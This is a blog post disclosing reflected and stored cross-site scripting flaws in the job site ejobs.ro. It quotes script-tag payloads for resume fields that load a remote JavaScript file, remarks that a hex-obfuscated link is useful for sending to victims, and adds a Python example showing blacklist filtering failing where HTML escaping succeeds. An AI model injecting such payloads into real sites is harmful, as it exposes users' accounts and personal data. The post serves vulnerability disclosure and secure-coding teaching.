eJobs.ro XSS hacks

05/07/08 | by zveriu | Categories: AskAmit, Hack

UPDATE: check the second part here

Well, this is not necessarily big news or a breakthrough… :)

However, it is sad to see that big, long-established players in various markets (job & recruitment, online payments, news corporations, search engines, etc.) are still susceptible to well-known and widespread attacks such as XSS, and so still put their main and most important assets at risk.

Taking ejobs.ro as the example:
- 2.5 Mil persons/month using their services
- 1 Mil resumes they possess
- 9 years of presence on the market
- No1 position on the market
All of the above are according to one of their banners:

[image: ejobs.ro banner]

I am asking myself - wasn’t the compromise of monster.com’s intelligence assets a good and sufficient example? :?: :no:

What is even sadder is that they do have some kind of filters/sanitisation implemented (as you will see below). But those security measures look more like they:
- are home-made - there is no unified sanitisation policy or library/package
- treat some local, specific bugs/cases - security/code auditing is not practised across the entire SDLC
- are buggy/obsolete - they tend to be more of a maintenance burden than a help to the software product as a whole

Let’s look at some technical details :> (NB: dear ejobs.ro - pay special attention :!: or contact me, as we can collaborate on a freelance/consulting basis ;D)

1. XSS reflected attack.
Click the link here (harmless code - only a proof-of-concept alert box :!:). It is fully HEX obfuscated (easily deobfuscated with current editing software), but useful when sending it to the victim :>:oops:

Code:

[image: XSS reflection IE]

It looks like no sanitisation is done at all. Also, I keep arguing with industry colleagues who disagree: outputting user input into the title of the page (be it a search term, etc.) brings no benefit, rather the opposite - it is a pain-in-the-ass :))

2. XSS stored attack.

[image: XSS stored FF]

This specific case, found while probing for XSS, has shown that there are some sanitisation routines… which will most likely have to be improved…

If you have an account and a resume, try either of the injection codes below in the Obiectiv or Beneficii textboxes (save and preview the CV using “Cum vad companiile CVul meu” (how companies see my CV). The answer would be - “FOARTE FOARTE PROST :)!” (VERY, VERY BAD))

Code:

<script src="http://andreicostin.com/xss.js"</script>
OR

Code:

<script
src=
"
http://andreicostin.com/xss.js
"
</script >

Both XSS attacks worked for me in IE6, IE7, FF2.

It seems that even after many decades, proper parsing is still an issue for most developers - be it a lack of technical knowledge or simply a lack of interest in complicating their lives with the additional “useless” burden of security assessment…
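To show why a pattern-matching blacklist of the kind described above fails while contextual output encoding does not, here is an added example (my own code, not ejobs.ro’s). It feeds the two resume-field payloads quoted in this post through a hypothetical home-made filter that only recognises a complete, well-formed script element, and then through plain HTML entity escaping; the same escaping is applied to the page title for the reflected case.

```python
import html
import re

# Constructed samples. The first two are the resume-field payloads quoted in
# the post; the third is the same tag written correctly; the last is an
# ordinary value a candidate might legitimately type into "Obiectiv".
PAYLOAD_ONE_LINE = '<script src="http://andreicostin.com/xss.js"</script>'
PAYLOAD_MULTI_LINE = '<script\nsrc=\n"\nhttp://andreicostin.com/xss.js\n"\n</script >'
WELL_FORMED = '<script src="http://andreicostin.com/xss.js"></script>'
BENIGN = 'Obiectiv: senior C++ developer, salary > 2000 EUR'

# Hypothetical home-made blacklist of the kind the post criticises: it only
# recognises a complete, well-formed <script ...>...</script> element.
SCRIPT_ELEMENT = re.compile(r'<script[^>]*>.*?</script>', re.IGNORECASE | re.DOTALL)


def blacklist_filter(value: str) -> str:
    """Strip what the pattern recognises; anything else passes through untouched."""
    return SCRIPT_ELEMENT.sub('', value)


def escape_for_html_text(value: str) -> str:
    """Contextual output encoding: <, >, &, " and ' become entities, so the
    browser cannot interpret user data as markup, however it is shaped."""
    return html.escape(value, quote=True)


def render_cv_field(value: str, encode) -> str:
    """Render a CV field the way a preview page would, with a chosen defence."""
    return f'<div class="cv-field">{encode(value)}</div>'


def render_title(search_term: str) -> str:
    """The reflected case: user input in <title>. Title text is still HTML text
    content, so the same escaping applies there."""
    return f'<title>Search results for {escape_for_html_text(search_term)}</title>'


def script_survives(rendered: str) -> bool:
    """True if a literal <script tag still reaches the browser as markup."""
    return '<script' in rendered.lower()


if __name__ == '__main__':
    for name, sample in [('one-line', PAYLOAD_ONE_LINE), ('multi-line', PAYLOAD_MULTI_LINE),
                         ('well-formed', WELL_FORMED), ('benign', BENIGN)]:
        print(f'{name:11} blacklist lets <script through: '
              f'{script_survives(render_cv_field(sample, blacklist_filter))}; '
              f'escaping lets it through: '
              f'{script_survives(render_cv_field(sample, escape_for_html_text))}')
```

The blacklist removes only the well-formed tag and passes both malformed payloads (which the browsers listed above still execute) untouched, whereas escaping neutralises every variant without needing to know what a script tag looks like.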

DISCLAIMER: this post is intended purely for security research and educational purposes, as well as to urge the vendor to fix the problems posing threats to its customers. Any use of this information is the sole responsibility of the reader, and the author is not to be held liable for any misuse of the above informative technical details.
